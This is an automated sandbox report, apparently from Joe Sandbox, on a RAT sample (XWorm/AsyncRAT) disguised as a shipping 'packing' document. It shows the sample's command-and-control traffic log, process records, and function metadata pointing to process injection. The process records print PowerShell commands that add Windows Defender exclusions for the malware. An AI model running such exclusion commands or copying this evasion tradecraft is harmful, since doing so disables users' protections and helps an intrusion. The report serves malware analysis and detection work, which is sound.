Oct 27, 2024 00:29:45.313359976 CEST	7061	50002	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:46.833213091 CEST	50002	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:46.838704109 CEST	7061	50002	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:53.765464067 CEST	7061	50002	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:53.765558004 CEST	50002	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:55.636200905 CEST	50002	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:55.641781092 CEST	7061	50002	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:55.647985935 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:55.653409004 CEST	7061	50003	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:55.655591011 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:55.805562019 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:55.810976028 CEST	7061	50003	104.250.180.178	192.168.2.5
Oct 27, 2024 00:29:56.473603964 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:29:56.479196072 CEST	7061	50003	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:01.677139997 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:01.682749033 CEST	7061	50003	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:04.127914906 CEST	7061	50003	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:04.127985001 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:05.895723104 CEST	50003	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:05.898200035 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:05.901578903 CEST	7061	50003	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:05.904155016 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:05.904247999 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:05.993892908 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:06.001924038 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:12.770580053 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:12.778040886 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:15.335119009 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:15.335205078 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:15.336143017 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:15.336194038 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:15.336556911 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:15.336596012 CEST	50004	7061	192.168.2.5	104.250.180.178
Oct 27, 2024 00:30:15.336961985 CEST	7061	50004	104.250.180.178	192.168.2.5
Oct 27, 2024 00:30:15.339184046 CEST	50004	7061	192.168.2.5	104.250.180.178

Analysis Process: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exePID: 1988, Parent PID: 1028

General

Target ID:	0
Start time:	18:26:00
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe"
Imagebase:	0xdf0000
File size:	523'776 bytes
MD5 hash:	632F722953592E348C533977A5F251D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exePID: 6592, Parent PID: 1988

General

Target ID:	3
Start time:	18:26:01
Start date:	26/10/2024
Path:	C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe"
Imagebase:	0x740000
File size:	523'776 bytes
MD5 hash:	632F722953592E348C533977A5F251D7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	18:26:05
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:26:05
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:26:09
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe'
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:26:09
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:26:13
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:26:13
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:26:18
Start date:	26/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:26:18
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exePID: 1988, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	220
Total number of Limit Nodes:	15

Executed Functions

Function 0903A158 Relevance: 6.6, Strings: 5, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 0903A260
,aq, xrefs: 0903A2D8
(o]q, xrefs: 0903A252
,aq, xrefs: 0903A2CA
8'|, xrefs: 0903A186

Memory Dump Source

Source File: 00000000.00000002.2055409896.0000000009030000.00000040.00000800.00020000.00000000.sdmp, Offset: 09030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9030000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq$8'|
API String ID: 0-152464937
Opcode ID: a9870a8423a4fa9d57dc134ec1909801f905d0d7cec96c73700c820af1645fa4
Instruction ID: 37cf4e8a0d1e9044041a6d9135f4b181d63872cf62706cf01a00afe2daffc880
Opcode Fuzzy Hash: a9870a8423a4fa9d57dc134ec1909801f905d0d7cec96c73700c820af1645fa4
Instruction Fuzzy Hash: 3FD12971B00119CFCB54CFA9D988AADBBFABF88340F95C569E495EB261D730D841CB50

Function 0903CC68 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

4']q, xrefs: 0903D6F3
(o]q, xrefs: 0903D0F8
\>|, xrefs: 0903CE74
\>|, xrefs: 0903CEB8

Memory Dump Source

Source File: 00000000.00000002.2055409896.0000000009030000.00000040.00000800.00020000.00000000.sdmp, Offset: 09030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9030000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID: (o]q$4']q$\>|$\>|
API String ID: 0-31554801
Opcode ID: caea55ab068c7295d7b3cadd407314038460d8229761b96733b099eb45a9215b
Instruction ID: cc28f7c6569ead6b9531b86ec3defa4e8f92e11c0217a4342daed8982df68ebc
Opcode Fuzzy Hash: caea55ab068c7295d7b3cadd407314038460d8229761b96733b099eb45a9215b
Instruction Fuzzy Hash: 4C828075A00209DFCB15CF68C484AAEBBFAFF89300F55C959E819DB2A1D731E885CB51

Function 090399F0 Relevance: 3.1, Strings: 2, Instructions: 562
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 09039F1A
Haq, xrefs: 09039DE6

Memory Dump Source

Source File: 00000000.00000002.2055409896.0000000009030000.00000040.00000800.00020000.00000000.sdmp, Offset: 09030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9030000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: ecee27c6698a887da9e6f23749ef443e07d99b535e8908178454a1c6c77602a0
Instruction ID: 84e6aa391f39bc21bae1671ef0ee58e2173aaef397146360f9494475c8dbb70a
Opcode Fuzzy Hash: ecee27c6698a887da9e6f23749ef443e07d99b535e8908178454a1c6c77602a0
Instruction Fuzzy Hash: 4C229971A00219DFDB54DF69C844AAEBBFABF88300F54C969E8159B391DB74DC41CB90

Function 0903F3F8 Relevance: 1.7, Strings: 1, Instructions: 491COMMON

Download Yara Rule

Strings

xH|, xrefs: 0903F494

Memory Dump Source

Source File: 00000000.00000002.2055409896.0000000009030000.00000040.00000800.00020000.00000000.sdmp, Offset: 09030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9030000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID: xH|
API String ID: 0-185599305
Opcode ID: c1c52ce5d3086d02eac8ebe93a01d9f9385911ae361379f624b637e9d3ee1864
Instruction ID: d62885ae22d459af7d37b77424b4c9b0cb11bc8cbab01592bc0ee6f3db46969f
Opcode Fuzzy Hash: c1c52ce5d3086d02eac8ebe93a01d9f9385911ae361379f624b637e9d3ee1864
Instruction Fuzzy Hash: 5832B170D0121A8FEB54DF69C580A8EFBF6BF48311F95D595E508AB212CB30E985CFA0

Function 097F2CA0 Relevance: 1.6, APIs: 1, Instructions: 61nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 097F2D27

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: b1d3cce47aef4fbebcad5a18183b66964b17edcc61b0b3fdb632e68bb60aafd9
Instruction ID: 598902ac1d1d3ed7082b472d457bd5d62c547ad842db58ecd816f1ef941bdfa6
Opcode Fuzzy Hash: b1d3cce47aef4fbebcad5a18183b66964b17edcc61b0b3fdb632e68bb60aafd9
Instruction Fuzzy Hash: B721D0B69002499FCB10CF9AD884ADEFBF4FB48310F10842AE928A7710C375A540CFA5

Function 097F2CA8 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 097F2D27

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 70c27d3a7bbfde419ef15432002b487daae803f7047460890ba28de65d3d1c13
Instruction ID: 5d31b39d0bebcddb7b3c383fd34ca00887e55560fc6dcef57a9b8c166b6312cc
Opcode Fuzzy Hash: 70c27d3a7bbfde419ef15432002b487daae803f7047460890ba28de65d3d1c13
Instruction Fuzzy Hash: 2921CEB5900249DFCB10DF9AD884ADEFBF4FB48310F10842AE918A7350C379A944CFA5

Function 097F0040 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4499de224cb3543a145ae9f85fdb33f0de9567ad493af4ca8d73828a155c91c
Instruction ID: f7d77c88786e6781121fdb61bcbf3809077ff7c15862ddecfc1c2a08b6e7ba18
Opcode Fuzzy Hash: f4499de224cb3543a145ae9f85fdb33f0de9567ad493af4ca8d73828a155c91c
Instruction Fuzzy Hash: D842A075E01228CFDB64CFA9C994B9DBBF2BF48301F1481A9E909A7355D731AA81CF50

Function 08DD1BC0 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2055335015.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc18e0581beca4e3652c0158aaada17b1b23a5737b2594da575bf1d85a94f6a
Instruction ID: be59469308eb87fc8f03df9010817ed88467ca516a3aa6428bd8609e33987a34
Opcode Fuzzy Hash: ebc18e0581beca4e3652c0158aaada17b1b23a5737b2594da575bf1d85a94f6a
Instruction Fuzzy Hash: 81E1AB317017088FDB25DB6AC450BAEB7FAEF89781F24456ED14A9B3A0CB74E801CB51

Function 097F33FC Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb8c577cd7f30e136e35f4b785f6ca3cb65504aab22d8d907150632a002d611a
Instruction ID: 9aea1835997d4af9899bb3d7bf47b4f0e1f99f124db9379edbb1e041e2b08ad4
Opcode Fuzzy Hash: fb8c577cd7f30e136e35f4b785f6ca3cb65504aab22d8d907150632a002d611a
Instruction Fuzzy Hash: 15615975E002198FCF04DFA9D8989EEBBF2EF88310F14842AE915A7364DB349906CB50

Function 097F5020 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f5f8924668cec66fdce3343d5625b5654c05c2bb65c49b572e759e50222805
Instruction ID: 2b6a8d9177ec357d77b592e7571a7e76188a6dd2fbe7f73d7b03f492bf787b94
Opcode Fuzzy Hash: e8f5f8924668cec66fdce3343d5625b5654c05c2bb65c49b572e759e50222805
Instruction Fuzzy Hash: 35518F71D006199FDB08CFEAC8846EEBBB2BF89300F10902AE919BB254DB745946CB50

Function 097F5018 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b7cdd0cc3a00963855e19e9109f449aedd5fc6cf8b8f396816c427960e33b4
Instruction ID: c6777958e355a550b1b8cb4f4c13e637606149d7490d8b7d7cdf3874af3c912e
Opcode Fuzzy Hash: 72b7cdd0cc3a00963855e19e9109f449aedd5fc6cf8b8f396816c427960e33b4
Instruction Fuzzy Hash: 1E418275E006199BDB08CFEAC9856AEFBF2AF89300F14C02AE518AB354DB345946CB40

Function 014FD3C9 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014FD456
GetCurrentThread.KERNEL32 ref: 014FD493
GetCurrentProcess.KERNEL32 ref: 014FD4D0
GetCurrentThreadId.KERNEL32 ref: 014FD529

Memory Dump Source

Source File: 00000000.00000002.2051876261.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0a26678985a51043eb3ee6f049bbbf74265809587299cc8b89065d5a3e613c48
Instruction ID: 92ba0a8d82336e3da66469a90c279f4f010290082e20eb54b60027b448b43f1b
Opcode Fuzzy Hash: 0a26678985a51043eb3ee6f049bbbf74265809587299cc8b89065d5a3e613c48
Instruction Fuzzy Hash: AE5167B09002498FDB18DFA9D548BAEBFF5FF48314F24845ED119A7360D738A984CB65

Function 014FD3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014FD456
GetCurrentThread.KERNEL32 ref: 014FD493
GetCurrentProcess.KERNEL32 ref: 014FD4D0
GetCurrentThreadId.KERNEL32 ref: 014FD529

Memory Dump Source

Source File: 00000000.00000002.2051876261.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: deaeac8662df5bb3fd92727a6dd7cf0a66836473309ccfd6865f2980f6a7d305
Instruction ID: 32f1e2395563fbdf4cf2a591752d84f9e6a0fa2870c2d2bea74254e98b44f27e
Opcode Fuzzy Hash: deaeac8662df5bb3fd92727a6dd7cf0a66836473309ccfd6865f2980f6a7d305
Instruction Fuzzy Hash: 5A5157B09002099FDB18DFAAD548BAEBFF5FF48314F24845ED119A7360D734A984CB65

Function 097FE805 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 097FEA46

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 186aae4a445619b8030df831575db2bc3708025de651c369f0a69c11d01dfd29
Instruction ID: c1ca9f2c23869b891ed7b093bc00680f257f38596cee2b9d0c3fb615073c3a5b
Opcode Fuzzy Hash: 186aae4a445619b8030df831575db2bc3708025de651c369f0a69c11d01dfd29
Instruction Fuzzy Hash: BAA14A72D00219CFDB24DF68C851BADBBB2BF44310F1481AAE919B7360DB749985CF92

Function 097FE810 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 097FEA46

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 487871ca38e9a640e1717457038cc8feaa4f62e228de043d39f2472bec6eae00
Instruction ID: f94d7ef408983b2d1f9a3ba561a289b0adfd7ca03f118b1d002b01d38777a5c9
Opcode Fuzzy Hash: 487871ca38e9a640e1717457038cc8feaa4f62e228de043d39f2472bec6eae00
Instruction Fuzzy Hash: EF915B72D00219CFDB24DF68C851BADBBB2BF44310F14816AE919B7350DB749985CF92

Function 014FAD48 Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 014FAF9E

Memory Dump Source

Source File: 00000000.00000002.2051876261.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2daba618a41e9d0e501adab77cc9e1c9d86fd621d09f342e0c343cdeb2a060cc
Instruction ID: ea1a6cddcb46cb78f893998ca64c6a18eb69522037a939b26852a721ed7b67c3
Opcode Fuzzy Hash: 2daba618a41e9d0e501adab77cc9e1c9d86fd621d09f342e0c343cdeb2a060cc
Instruction Fuzzy Hash: 08812370A00B058FD724DF2AD44475BBBF5BF88214F108A2ED58A97B60DB35E849CB91

Function 014F590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 014F59C9

Memory Dump Source

Source File: 00000000.00000002.2051876261.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 27a12095b73b89be9eea72041f8ffce7e1b0b5981dbb92e8110cf2a67f4ac37d
Instruction ID: aca47d68a45a160e3c24d2afadeb8ae3e20b6e413d5b2deeb5e543bc9188e7ca
Opcode Fuzzy Hash: 27a12095b73b89be9eea72041f8ffce7e1b0b5981dbb92e8110cf2a67f4ac37d
Instruction Fuzzy Hash: F44103B0C0071DCFDB14CFA9C884B9EBBB5BF49304F20806AD518AB265D7756946CF91

Function 014F44F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 014F59C9

Memory Dump Source

Source File: 00000000.00000002.2051876261.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1c788a4e14b36fa7373f24260b796e164dadf7af811907de8153f10d5c788c99
Instruction ID: 10b8f0241c48e0694ae4c94b22b67b3b5fe5559385556e5606b2db12e4338024
Opcode Fuzzy Hash: 1c788a4e14b36fa7373f24260b796e164dadf7af811907de8153f10d5c788c99
Instruction Fuzzy Hash: 7D41D2B0C0071DCFDB24DFA9C944B9EBBB5BF49304F20805AD518AB265DBB56946CF90

Function 097FE581 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 097FE618

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f5ff7894aa1fbb4a8abcad62994d66d839de46470641d6b837f679cab02203fd
Instruction ID: fcd8adac615350081d3d63957677cdff53934e011368c30bf8fff2dd2c6dc889
Opcode Fuzzy Hash: f5ff7894aa1fbb4a8abcad62994d66d839de46470641d6b837f679cab02203fd
Instruction Fuzzy Hash: 7D2148719003499FCB10DFA9C885BEEBBF5FF48310F10842AE919A7250D7789944CBA5

Function 097FE588 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 097FE618

Memory Dump Source

Source File: 00000000.00000002.2056560012.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97f0000_PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f8ef1c3e53eaef348de270fc92516588ba59733a2a861d80e5323c7893ce17f1
Instruction ID: 5e3ada116007ba54b58d777f6908be6005353023c2b2fb4868d2314d4bab2895
